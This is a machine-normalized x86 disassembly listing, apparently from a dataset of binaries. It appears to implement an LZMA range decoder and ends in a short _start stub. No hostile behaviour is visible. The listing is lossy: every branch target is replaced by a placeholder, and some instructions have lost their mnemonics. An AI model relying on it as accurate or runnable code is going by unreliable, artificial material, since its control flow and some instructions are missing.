sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov [ ecx ] ax
mov eax [ ebp - 0x18 ]
inc eax
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ecx ] di
mov eax ebx
jmp r-xdata
cmp [ ebp - 0x40 ] 0x0
mov ecx [ ebp - 0x38 ]
mov edi [ ebp - 0x28 ]
mov [ ebp - 0x44 ] ecx
mov ecx [ ebp - 0x34 ]
mov [ ebp - 0x38 ] ecx
mov ecx [ ebp - 0x24 ]
mov [ ebp - 0x34 ] ecx
lea ecx [ eax + 0x1 ]
mov [ ebp - 0x24 ] ecx
jne r-xdata
xor edi edi
inc edi
mov ecx eax
mov ebx eax
shr ecx 0x1
and ebx edi
dec ecx
or ebx 0x2
cmp eax 0xe
mov [ ebp - 0x50 ] ecx
jae r-xdata
sub eax 0x40
cmp eax 0x4
jb r-xdata
cmp eax [ ebp - 0x40 ]
cmp eax [ ebp - 0x20 ]
jmp r-xdata
sub ecx 0x4
shl ebx cl
mov [ ebp - 0x48 ] edi
mov [ ebp - 0x18 ] ebx
sub ebx eax
mov eax [ ebp - 0x1c ]
lea ecx [ eax + ebx * 2 + 0x55e ]
mov [ ebp - 0x10 ] ecx
cmp [ ebp - 0xc ] 0x13
sbb eax eax
and eax 0xfffffffd
add eax 0xa
mov [ ebp - 0xc ] eax
jae r-xdata
shr esi 0x1
sub [ ebp - 0x4 ] esi
mov eax [ ebp - 0x4 ]
shr eax 0x1f
neg eax
lea ebx [ eax + ebx * 2 + 0x1 ]
and eax esi
add [ ebp - 0x4 ] eax
dec ecx
jne r-xdata
mov edi [ ebp - 0x8 ]
mov eax [ ebp - 0x4 ]
movzx edi [ edi ]
shl eax 0x8
or eax edi
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] eax
mov ebx esi
shr ebx 0xb
imul ebx eax
cmp [ ebp - 0x4 ] ebx
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov ecx [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl ecx 0x8
or ecx ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] ecx
mov ecx [ ebp - 0x10 ]
cmp esi 0x1000000
jae r-xdata
mov ecx [ ebp - 0x1c ]
movzx eax [ ecx + 0x646 ]
shl ebx 0x4
cmp esi 0x1000000
mov [ ebp - 0x18 ] ebx
jae r-xdata
sub [ ebp - 0x4 ] ebx
mov ecx eax
shr ecx 0x5
sub eax ecx
mov ecx [ ebp - 0x10 ]
mov [ edi + ecx ] ax
mov eax [ ebp - 0x18 ]
sub esi ebx
inc edi
or eax [ ebp - 0x48 ]
mov [ ebp - 0x18 ] eax
mov esi ebx
mov ebx 0x800
sub ebx eax
shr ebx 0x5
add ebx eax
mov eax [ ebp - 0x18 ]
mov [ edi + ecx ] bx
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
add edi edi
cmp esi 0x1000000
movzx eax [ edi + ecx ]
jae r-xdata
jmp r-xdata
shl [ ebp - 0x48 ] 0x1
dec [ ebp - 0x50 ]
jne r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
or [ ebp - 0x18 ] 0x1
mov [ ecx + 0x646 ] ax
push 0x3
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ecx + 0x646 ] di
push 0x2
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
mov ebx [ ebp - 0x2c ]
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
cmp esi 0x1000000
pop eax
lea ebx [ eax + eax ]
lea ecx [ ebx + ecx + 0x644 ]
movzx eax [ ecx ]
mov [ ebp - 0x2c ] ebx
jae r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov [ ecx ] ax
mov eax [ ebp - 0x2c ]
inc eax
or [ ebp - 0x18 ] 0x2
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ecx ] di
mov eax ebx
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
mov ebx [ ebp - 0x2c ]
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
cmp esi 0x1000000
lea ebx [ eax + eax ]
mov eax [ ebp - 0x1c ]
lea ecx [ ebx + eax + 0x644 ]
movzx eax [ ecx ]
mov [ ebp - 0x2c ] ebx
jae r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov [ ecx ] ax
mov eax [ ebp - 0x2c ]
inc eax
or [ ebp - 0x18 ] 0x4
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov [ ecx ] di
mov eax ebx
jmp r-xdata
mov edi esi
shr edi 0xb
imul edi eax
cmp [ ebp - 0x4 ] edi
jae r-xdata
mov ebx [ ebp - 0x8 ]
mov edi [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl edi 0x8
or edi ebx
shl esi 0x8
inc [ ebp - 0x8 ]
mov [ ebp - 0x4 ] edi
cmp esi 0x1000000
mov ecx [ ebp - 0x1c ]
lea ecx [ ecx + eax * 2 + 0x644 ]
movzx eax [ ecx ]
jae r-xdata
sub [ ebp - 0x4 ] edi
sub esi edi
mov edi eax
shr edi 0x5
sub eax edi
mov [ ecx ] ax
mov eax [ ebp - 0x18 ]
or eax 0x8
mov esi edi
mov edi 0x800
sub edi eax
shr edi 0x5
add edi eax
mov eax [ ebp - 0x18 ]
mov [ ecx ] di
jmp r-xdata
add [ ebp - 0x28 ] 0x112
sub [ ebp - 0xc ] 0xc
cmp eax 0xffffffff
je r-xdata
sub_4021d6
push ebp
mov ebp esp
push ecx
push ecx
mov edx [ eax + 0x48 ]
test edx edx
je r-xdata
leave
retn 0x4
cmp edx 0x112
jae r-xdata
mov ecx [ eax + 0x24 ]
push ebx
mov ebx [ eax + 0x38 ]
push esi
mov esi [ eax + 0x14 ]
push edi
mov edi [ eax + 0x28 ]
mov [ ebp - 0x4 ] ebx
mov ebx [ ebp + 0x8 ]
mov [ ebp - 0x8 ] edi
mov edi edx
sub ebx ecx
cmp ebx edi
jae r-xdata
cmp [ eax + 0x30 ] 0x0
jne r-xdata
mov edi ebx
add [ eax + 0x2c ] edi
sub edx edi
test edi edi
mov [ eax + 0x48 ] edx
je r-xdata
mov ebx [ eax + 0xc ]
sub ebx [ eax + 0x2c ]
cmp ebx edi
ja r-xdata
pop edi
pop esi
mov [ eax + 0x24 ] ecx
pop ebx
cmp ecx [ ebp - 0x4 ]
sbb edx edx
and edx [ ebp - 0x8 ]
sub edx [ ebp - 0x4 ]
add edx ecx
mov dl [ edx + esi ]
mov [ ecx + esi ] dl
inc ecx
dec edi
jne r-xdata
mov ebx [ eax + 0xc ]
mov [ eax + 0x30 ] ebx
sub_40224f
push ebx
mov ebx [ esp + 0x8 ]
push ebx
push edx
mov edx esi
call sub_401506
test eax eax
jne r-xdata
mov eax [ esi + 0xc ]
mov ecx [ esi + 0x24 ]
sub eax [ esi + 0x2c ]
mov ebx edi
sub ebx ecx
cmp ebx eax
jbe r-xdata
pop ebx
retn 0x4
mov eax [ esi + 0xc ]
cmp [ esi + 0x2c ] eax
jb r-xdata
lea edx [ ecx + eax ]
push edi
mov eax esi
call sub_4021d6
cmp [ esi + 0x24 ] edi
jae r-xdata
mov [ esi + 0x30 ] eax
mov eax 0x112
cmp [ esi + 0x18 ] ebx
jae r-xdata
xor eax eax
mov [ esi + 0x48 ] eax
mov eax 0x112
cmp [ esi + 0x48 ] eax
jb r-xdata
cmp [ esi + 0x30 ] 0x0
mov edx edi
jne r-xdata
jmp r-xdata
cmp [ esi + 0x48 ] eax
jbe r-xdata
sub_4022b9
push ebp
mov ebp esp
sub esp 0x18
mov ecx [ eax + 0x20 ]
mov edx [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ecx
mov ecx [ ebp + 0xc ]
add edx ecx
mov ecx [ eax + 0x8 ]
mov [ ebp + 0xc ] edx
xor edx edx
inc edx
shl edx cl
push ebx
mov ebx [ eax + 0x34 ]
push esi
mov esi [ eax + 0x1c ]
dec edx
and edx [ eax + 0x2c ]
mov ecx ebx
shl ecx 0x4
push edi
mov edi [ eax + 0x10 ]
add ecx edx
cmp esi 0x1000000
movzx ecx [ edi + ecx * 2 ]
mov [ ebp - 0x8 ] edi
mov [ ebp - 0x14 ] ecx
jae r-xdata
mov ecx esi
shr ecx 0xb
imul ecx [ ebp - 0x14 ]
cmp [ ebp - 0x4 ] ecx
jae r-xdata
mov ecx [ ebp + 0x8 ]
cmp ecx [ ebp + 0xc ]
jae r-xdata
sub [ ebp - 0x4 ] ecx
sub esi ecx
mov edi 0x1000000
cmp esi edi
jae r-xdata
mov esi ecx
mov ecx [ ebp - 0x8 ]
add ecx 0xe6c
cmp [ eax + 0x30 ] 0x0
mov [ ebp - 0xc ] ecx
jne r-xdata
xor eax eax
jmp r-xdata
mov edi [ ebp - 0x4 ]
movzx ecx [ ecx ]
shl edi 0x8
or edi ecx
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] edi
mov ecx [ ebp - 0x8 ]
movzx ecx [ ecx + ebx * 2 + 0x180 ]
mov eax esi
shr eax 0xb
imul eax ecx
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
mov ecx [ eax + 0x24 ]
test ecx ecx
jne r-xdata
cmp [ eax + 0x2c ] 0x0
je r-xdata
pop edi
pop esi
pop ebx
leave
retn
sub [ ebp - 0x4 ] eax
sub esi eax
cmp esi edi
mov [ ebp - 0x10 ] 0x3
jae r-xdata
mov ecx [ ebp - 0x8 ]
and [ ebp - 0x18 ] 0x0
mov esi eax
add ecx 0x664
mov [ ebp - 0x10 ] 0x2
jmp r-xdata
mov ecx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ecx 0x8
or ecx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ecx
mov edi [ eax + 0x14 ]
movzx edi [ edi + ecx - 0x1 ]
mov edx [ eax ]
xor ecx ecx
mov cl 0x8
sub cl dl
shr edi cl
mov ecx [ eax + 0x4 ]
xor edx edx
inc edx
shl edx cl
mov ecx [ eax ]
dec edx
and edx [ eax + 0x2c ]
shl edx cl
add edi edx
lea ecx [ edi + edi * 2 ]
shl ecx 0x9
add [ ebp - 0xc ] ecx
mov ecx [ eax + 0x28 ]
cmp ebx 0x7
jae r-xdata
mov eax [ ebp - 0x8 ]
movzx eax [ eax + ebx * 2 + 0x198 ]
mov ecx esi
shr ecx 0xb
imul ecx eax
cmp [ ebp - 0x4 ] ecx
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
cmp esi edi
jae r-xdata
mov edx [ eax + 0x24 ]
mov edi [ eax + 0x38 ]
cmp edx edi
jae r-xdata
xor ecx ecx
inc ecx
mov edi 0x1000000
sub [ ebp - 0x4 ] ecx
sub esi ecx
cmp esi edi
jae r-xdata
mov eax [ ebp - 0x8 ]
add ebx 0xf
shl ebx 0x4
add ebx edx
cmp ecx edi
movzx ebx [ eax + ebx * 2 ]
mov esi ecx
jae r-xdata
mov ecx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ecx 0x8
or ecx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ecx
movzx ebx [ ecx ]
mov eax esi
shr eax 0xb
imul eax ebx
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
xor ecx ecx
mov ecx [ eax + 0x28 ]
jmp r-xdata
mov eax esi
shr eax 0xb
imul eax edx
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
mov ecx [ ebp - 0x8 ]
movzx ecx [ ecx + ebx * 2 + 0x1b0 ]
mov eax esi
shr eax 0xb
imul eax ecx
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
mov eax esi
shr eax 0xb
imul eax ebx
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
sub [ ebp - 0x4 ] eax
sub esi eax
cmp esi edi
jae r-xdata
shl edx 0x4
and [ ebp - 0x14 ] 0x0
mov esi eax
lea ecx [ edx + ecx + 0x4 ]
mov [ ebp - 0xc ] 0x8
jmp r-xdata
mov ebx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ebx 0x8
or ebx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ebx
mov ecx esi
shr ecx 0xb
imul ecx [ ebp - 0x14 ]
cmp [ ebp - 0x4 ] ecx
jae r-xdata
mov ecx [ ebp + 0x8 ]
cmp ecx [ ebp + 0xc ]
jae r-xdata
mov eax [ eax + 0x14 ]
sub eax edi
add eax edx
movzx eax [ eax + ecx ]
xor edx edx
mov [ ebp - 0x10 ] eax
mov [ ebp - 0x8 ] 0x100
inc edx
mov edi 0x1000000
sub [ ebp - 0x4 ] eax
sub esi eax
inc ecx
mov esi eax
jmp r-xdata
mov ebx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ebx 0x8
or ebx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ebx
sub [ ebp - 0x4 ] eax
sub esi eax
cmp esi edi
mov eax [ ebp - 0x8 ]
movzx ecx [ eax + ebx * 2 + 0x1c8 ]
jae r-xdata
mov esi eax
jmp r-xdata
mov ecx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ecx 0x8
or ecx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ecx
sub esi eax
sub [ ebp - 0x4 ] eax
cmp eax edi
jae r-xdata
movzx eax [ eax ]
shl ecx 0x8
mov esi ecx
mov ecx [ ebp - 0x4 ]
shl ecx 0x8
or ecx eax
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ecx
movzx ebx [ ecx + 0x2 ]
mov eax esi
shr eax 0xb
imul eax ebx
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
xor eax eax
inc eax
sub esi ecx
sub [ ebp - 0x4 ] ecx
lea edx [ edx + edx + 0x1 ]
mov esi ecx
add edx edx
not eax
jmp r-xdata
mov ebx [ ebp - 0x4 ]
movzx ecx [ ecx ]
shl ebx 0x8
or ebx ecx
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ebx
mov eax [ ebp - 0xc ]
add ecx ecx
cmp esi edi
movzx edx [ ecx + eax ]
jae r-xdata
jmp r-xdata
cmp ecx 0x100
jb r-xdata
mov eax esi
shr eax 0xb
imul eax ecx
cmp [ ebp - 0x4 ] eax
jb r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
mov ecx [ ebp - 0x8 ]
mov [ ebp - 0x18 ] 0xc
add ecx 0xa68
push 0x3
pop eax
jmp r-xdata
mov eax [ ebp + 0xc ]
cmp [ ebp + 0x8 ] eax
jae r-xdata
sub [ ebp - 0x4 ] eax
sub esi eax
add ecx 0x204
mov [ ebp - 0x14 ] 0x10
mov [ ebp - 0xc ] 0x100
push 0x8
mov esi eax
pop eax
shl edx 0x4
lea ecx [ edx + ecx + 0x104 ]
mov [ ebp - 0x14 ] eax
mov [ ebp - 0xc ] eax
jmp r-xdata
mov ebx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ebx 0x8
or ebx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ebx
movzx ebx [ eax + ecx ]
mov edx esi
shr edx 0xb
imul edx ebx
cmp [ ebp - 0x4 ] edx
jae r-xdata
mov edx [ ebp + 0x8 ]
cmp edx [ ebp + 0xc ]
jae r-xdata
shl [ ebp - 0x10 ] 0x1
mov eax [ ebp - 0x8 ]
and eax [ ebp - 0x10 ]
mov ebx [ ebp - 0xc ]
lea ecx [ eax + edx ]
add ecx [ ebp - 0x8 ]
cmp esi edi
movzx ecx [ ebx + ecx * 2 ]
mov [ ebp - 0x14 ] ecx
jae r-xdata
mov [ ebp - 0x10 ] 0x1
jmp r-xdata
and [ ebp - 0x8 ] eax
cmp edx 0x100
jb r-xdata
mov ebx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ebx 0x8
or ebx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ebx
sub [ ebp - 0x4 ] edx
sub esi edx
inc eax
mov esi edx
jmp r-xdata
mov ebx [ ebp - 0x4 ]
movzx edx [ edx ]
shl ebx 0x8
or ebx edx
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ebx
cmp esi edi
jae r-xdata
add eax eax
cmp esi edi
jae r-xdata
mov ecx [ ebp - 0x14 ]
sub ecx [ ebp - 0xc ]
add eax ecx
cmp [ ebp - 0x18 ] 0x4
jae r-xdata
cmp eax [ ebp - 0xc ]
jb r-xdata
mov eax [ ebp - 0x10 ]
mov eax [ ebp + 0xc ]
cmp [ ebp + 0x8 ] eax
jb r-xdata
cmp eax 0x4
jb r-xdata
mov ebx [ ebp - 0x8 ]
shl eax 0x7
lea eax [ eax + ebx + 0x360 ]
mov [ ebp - 0xc ] eax
xor eax eax
inc eax
push 0x3
pop eax
mov ecx esi
shr ecx 0xb
imul ecx edx
cmp [ ebp - 0x4 ] ecx
jae r-xdata
mov ecx [ ebp + 0x8 ]
cmp ecx [ ebp + 0xc ]
jae r-xdata
sub [ ebp - 0x4 ] ecx
sub esi ecx
inc eax
mov esi ecx
jmp r-xdata
mov ebx [ ebp + 0x8 ]
mov ecx [ ebp - 0x4 ]
movzx ebx [ ebx ]
shl ecx 0x8
or ecx ebx
mov ebx [ ebp - 0x8 ]
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ecx
mov ecx [ ebp - 0xc ]
add eax eax
cmp esi edi
movzx edx [ eax + ecx ]
jae r-xdata
sub eax 0x40
cmp eax 0x4
jb r-xdata
cmp eax 0x40
jb r-xdata
mov ecx eax
shr ecx 0x1
dec ecx
cmp eax 0xe
mov [ ebp - 0x14 ] ecx
jae r-xdata
sub ecx 0x4
mov edx eax
and edx 0x1
or edx 0x2
shl edx cl
sub edx eax
lea ecx [ ebx + edx * 2 + 0x55e ]
jmp r-xdata
mov eax [ ebp - 0x4 ]
shr esi 0x1
sub eax esi
shr eax 0x1f
dec eax
and eax esi
sub [ ebp - 0x4 ] eax
dec ecx
jne r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
xor edx edx
inc edx
cmp esi edi
jae r-xdata
lea ecx [ ebx + 0x644 ]
mov [ ebp - 0x14 ] 0x4
mov edx [ ebp - 0x4 ]
movzx eax [ eax ]
shl edx 0x8
or edx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] edx
movzx ebx [ edx + ecx ]
mov eax esi
shr eax 0xb
imul eax ebx
cmp [ ebp - 0x4 ] eax
jae r-xdata
mov eax [ ebp + 0x8 ]
cmp eax [ ebp + 0xc ]
jae r-xdata
sub [ ebp - 0x4 ] eax
sub esi eax
inc edx
mov esi eax
jmp r-xdata
mov ebx [ ebp - 0x4 ]
movzx eax [ eax ]
shl ebx 0x8
or ebx eax
shl esi 0x8
inc [ ebp + 0x8 ]
mov [ ebp - 0x4 ] ebx
add edx edx
cmp esi edi
jae r-xdata
dec [ ebp - 0x14 ]
jne r-xdata
sub_402872
mov eax [ esp + 0x4 ]
xor ecx ecx
xor edx edx
inc ecx
cmp [ esp + 0x8 ] edx
mov [ eax + 0x4c ] ecx
mov [ eax + 0x48 ] edx
mov [ eax + 0x58 ] edx
je r-xdata
cmp [ esp + 0xc ] edx
je r-xdata
mov [ eax + 0x2c ] edx
mov [ eax + 0x30 ] edx
mov [ eax + 0x50 ] ecx
retn
mov [ eax + 0x50 ] ecx
sub_4028b3
push ebp
mov ebp esp
push ecx
push ecx
push ebx
mov ebx [ ebp + 0x14 ]
push esi
mov esi [ ebp + 0x8 ]
push edi
mov edi [ ebx ]
push [ ebp + 0xc ]
and [ ebx ] 0x0
mov eax esi
mov [ ebp + 0x14 ] edi
call sub_4021d6
mov ecx [ ebp + 0x1c ]
and [ ecx ] 0x0
cmp [ esi + 0x48 ] 0x112
jne r-xdata
cmp [ esi + 0x4c ] 0x0
je r-xdata
cmp [ esi + 0x20 ] 0x0
jne r-xdata
mov eax [ ebp + 0xc ]
xor edx edx
cmp [ esi + 0x24 ] eax
mov [ ebp - 0x4 ] edx
jb r-xdata
test edi edi
jbe r-xdata
xor eax eax
cmp [ esi + 0x20 ] eax
setne al
mov [ ecx ] 0x1
xor edx edx
inc edx
mov eax [ esi + 0x48 ]
cmp eax edx
jne r-xdata
xor eax eax
cmp [ esi + 0x58 ] 0x5
jb r-xdata
mov eax [ esi + 0x58 ]
cmp eax 0x5
jae r-xdata
mov eax [ esi + 0x58 ]
test eax eax
jne r-xdata
mov ecx [ esi + 0x4 ]
add ecx [ esi ]
mov eax 0x300
shl eax cl
add eax 0x736
je r-xdata
cmp [ ebp + 0x18 ] edx
je r-xdata
cmp [ esi + 0x20 ] edx
je r-xdata
mov [ ecx ] 0x3
jmp r-xdata
cmp [ esi + 0x5c ] al
jne r-xdata
mov edx [ ebp + 0x10 ]
mov dl [ edx ]
mov [ eax + esi + 0x5c ] dl
inc [ esi + 0x58 ]
inc [ ebp + 0x10 ]
inc [ ebx ]
dec edi
mov [ ebp + 0x14 ] edi
jne r-xdata
and [ ebp + 0x8 ] 0x0
jmp r-xdata
cmp edi 0x14
jb r-xdata
and [ esi + 0x34 ] 0x0
and [ esi + 0x50 ] 0x0
mov [ esi + 0x44 ] edx
mov [ esi + 0x40 ] edx
mov [ esi + 0x3c ] edx
mov [ esi + 0x38 ] edx
mov edi [ esi + 0x10 ]
mov ecx eax
shr ecx 0x1
mov eax 0x4000400
[ edi ]
adc ecx ecx
[ edi ]
mov edi [ ebp + 0x14 ]
xor eax eax
jmp r-xdata
cmp eax edx
jne r-xdata
mov [ ecx ] 0x4
jmp r-xdata
pop edi
pop esi
pop ebx
leave
retn
inc eax
jmp r-xdata
mov ah [ esi + 0x5d ]
movzx edx [ esi + 0x5f ]
mov al [ esi + 0x5e ]
shl eax 0x8
or eax edx
movzx edx [ esi + 0x60 ]
or [ esi + 0x1c ] 0xffffffff
and [ esi + 0x4c ] 0x0
shl eax 0x8
or eax edx
and [ esi + 0x58 ] 0x0
mov [ esi + 0x20 ] eax
cmp eax 0x14
mov [ ebp - 0x8 ] eax
jb r-xdata
push edi
push [ ebp + 0x10 ]
mov eax esi
call sub_4022b9
test eax eax
pop ecx
pop ecx
je r-xdata
cmp [ ebp - 0x4 ] eax
jne r-xdata
mov [ ecx ] 0x2
jmp r-xdata
xor eax eax
inc eax
xor edx edx
inc edx
mov [ ebp - 0x4 ] edx
jmp r-xdata
xor eax eax
jmp r-xdata
cmp [ ebp + 0x8 ] edi
jae r-xdata
cmp eax 0x14
mov [ esi + 0x58 ] eax
jb r-xdata
push edi
push [ ebp + 0x10 ]
lea eax [ esi + 0x5c ]
push eax
call sub_4014e8
add esp 0xc
mov [ esi + 0x58 ] edi
add [ ebx ] edi
jmp r-xdata
cmp [ ebp - 0x4 ] 0x0
je r-xdata
mov eax [ ebp + 0x10 ]
lea edi [ edi + eax - 0x14 ]
jmp r-xdata
cmp [ esi + 0x50 ] 0x0
je r-xdata
mov edx [ ebp + 0x8 ]
mov ecx [ ebp + 0x10 ]
mov cl [ edx + ecx ]
mov [ eax + esi + 0x5c ] cl
inc eax
inc [ ebp + 0x8 ]
push eax
lea eax [ esi + 0x5c ]
push eax
mov eax esi
call sub_4022b9
test eax eax
pop ecx
pop ecx
je r-xdata
cmp [ ebp - 0x4 ] 0x0
je r-xdata
mov eax [ ebp + 0x1c ]
mov [ eax ] 0x3
mov edi [ ebp + 0x10 ]
push 0x2
pop ecx
cmp eax ecx
jne r-xdata
mov eax [ ebp + 0x10 ]
push edi
mov edi [ ebp + 0xc ]
mov [ esi + 0x18 ] eax
call sub_40224f
test eax eax
jne r-xdata
mov eax [ ebp + 0x8 ]
add [ ebx ] eax
cmp [ ebp - 0x4 ] 0x0
je r-xdata
mov edi [ ebp + 0xc ]
lea eax [ esi + 0x5c ]
push eax
mov [ esi + 0x18 ] eax
call sub_40224f
test eax eax
jne r-xdata
xor eax eax
mov eax [ esi + 0x18 ]
sub eax [ ebp + 0x10 ]
add [ ebx ] eax
add [ ebp + 0x10 ] eax
sub [ ebp + 0x14 ] eax
jmp r-xdata
mov eax [ ebp + 0x1c ]
mov [ eax ] ecx
push 0x2
pop ecx
cmp eax ecx
jne r-xdata
mov eax [ esi + 0x18 ]
sub eax [ ebp - 0x8 ]
mov ecx [ ebp + 0x8 ]
sub eax esi
lea eax [ ecx + eax - 0x5c ]
add [ ebx ] eax
add [ ebp + 0x10 ] eax
sub [ ebp + 0x14 ] eax
and [ esi + 0x58 ] 0x0
cmp [ esi + 0x48 ] 0x112
mov ecx [ ebp + 0x1c ]
jne r-xdata
mov edi [ ebp + 0x14 ]
jmp r-xdata
sub_402b62
cmp [ esp + 0xc ] 0x5
jb r-xdata
push 0x4
pop eax
retn
mov eax [ esp + 0x8 ]
movzx ecx [ eax + 0x2 ]
xor edx edx
mov dh [ eax + 0x4 ]
mov dl [ eax + 0x3 ]
shl edx 0x8
or edx ecx
movzx ecx [ eax + 0x1 ]
shl edx 0x8
or edx ecx
mov ecx 0x1000
cmp edx ecx
jae r-xdata
mov ecx [ esp + 0x4 ]
mov [ ecx + 0xc ] edx
mov al [ eax ]
cmp al 0xe1
jb r-xdata
mov edx ecx
movzx eax al
push esi
cdq
push 0x9
pop esi
idiv esi
push 0x5
pop esi
movzx eax al
mov [ ecx ] edx
cdq
idiv esi
pop esi
mov [ ecx + 0x8 ] eax
mov [ ecx + 0x4 ] edx
xor eax eax
retn
sub_402bc2
mov ecx [ eax + 0x4 ]
add ecx [ eax ]
push esi
mov esi 0x300
shl esi cl
add esi 0x736
cmp [ edi + 0x10 ] 0x0
je r-xdata
push ebx
push edi
call sub_402b4a
lea eax [ esi + esi ]
push eax
push ebx
call [ ebx ]
add esp 0x10
test eax eax
mov [ edi + 0x10 ] eax
mov [ edi + 0x54 ] esi
jne r-xdata
cmp esi [ edi + 0x54 ]
je r-xdata
xor eax eax
pop esi
retn
push 0x2
pop eax
pop esi
retn
sub_402c04
push ebp
mov ebp esp
sub esp 0x10
push [ ebp + 0x10 ]
lea eax [ ebp - 0x10 ]
push [ ebp + 0xc ]
push eax
call sub_402b62
add esp 0xc
test eax eax
jne r-xdata
leave
retn
push ebx
mov ebx [ ebp + 0x14 ]
push edi
mov edi [ ebp + 0x8 ]
lea eax [ ebp - 0x10 ]
call sub_402bc2
test eax eax
jne r-xdata
pop edi
pop ebx
push esi
lea esi [ ebp - 0x10 ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
movsd [ edi ] [ esi ]
pop esi
sub_402c41
push ebp
mov ebp esp
sub esp 0x70
mov eax [ ebp + 0xc ]
push ebx
push esi
mov esi [ ebp + 0x14 ]
mov ebx [ esi ]
xor ecx ecx
cmp ebx 0x5
push edi
mov edi [ eax ]
mov [ eax ] ecx
mov [ esi ] ecx
jae r-xdata
push [ ebp + 0x28 ]
lea eax [ ebp - 0x70 ]
push [ ebp + 0x1c ]
mov [ ebp - 0x5c ] ecx
push [ ebp + 0x18 ]
mov [ ebp - 0x60 ] ecx
push eax
call sub_402c04
add esp 0x10
test eax eax
jne r-xdata
push 0x6
pop eax
jmp r-xdata
pop edi
pop esi
pop ebx
leave
retn
mov eax [ ebp + 0x8 ]
mov [ ebp - 0x5c ] eax
lea eax [ ebp - 0x70 ]
push eax
mov [ ebp - 0x48 ] edi
call sub_40289d
mov [ esi ] ebx
mov ebx [ ebp + 0x24 ]
push ebx
push [ ebp + 0x20 ]
lea eax [ ebp - 0x70 ]
push esi
push [ ebp + 0x10 ]
push edi
push eax
call sub_4028b3
mov esi eax
add esp 0x1c
test esi esi
jne r-xdata
mov eax [ ebp - 0x4c ]
mov ecx [ ebp + 0xc ]
push [ ebp + 0x28 ]
mov [ ecx ] eax
lea eax [ ebp - 0x70 ]
push eax
call sub_402b4a
pop ecx
pop ecx
mov eax esi
cmp [ ebx ] 0x3
jne r-xdata
push 0x6
pop esi
_start
push ebp
mov ebp esp
sub esp 0x574
mov [ ebp - 0x12c ] 0x0
mov [ ebp - 0x154 ] 0x0
mov [ ebp - 0x284 ] 0x0
call sub_45b27d
nop
nop
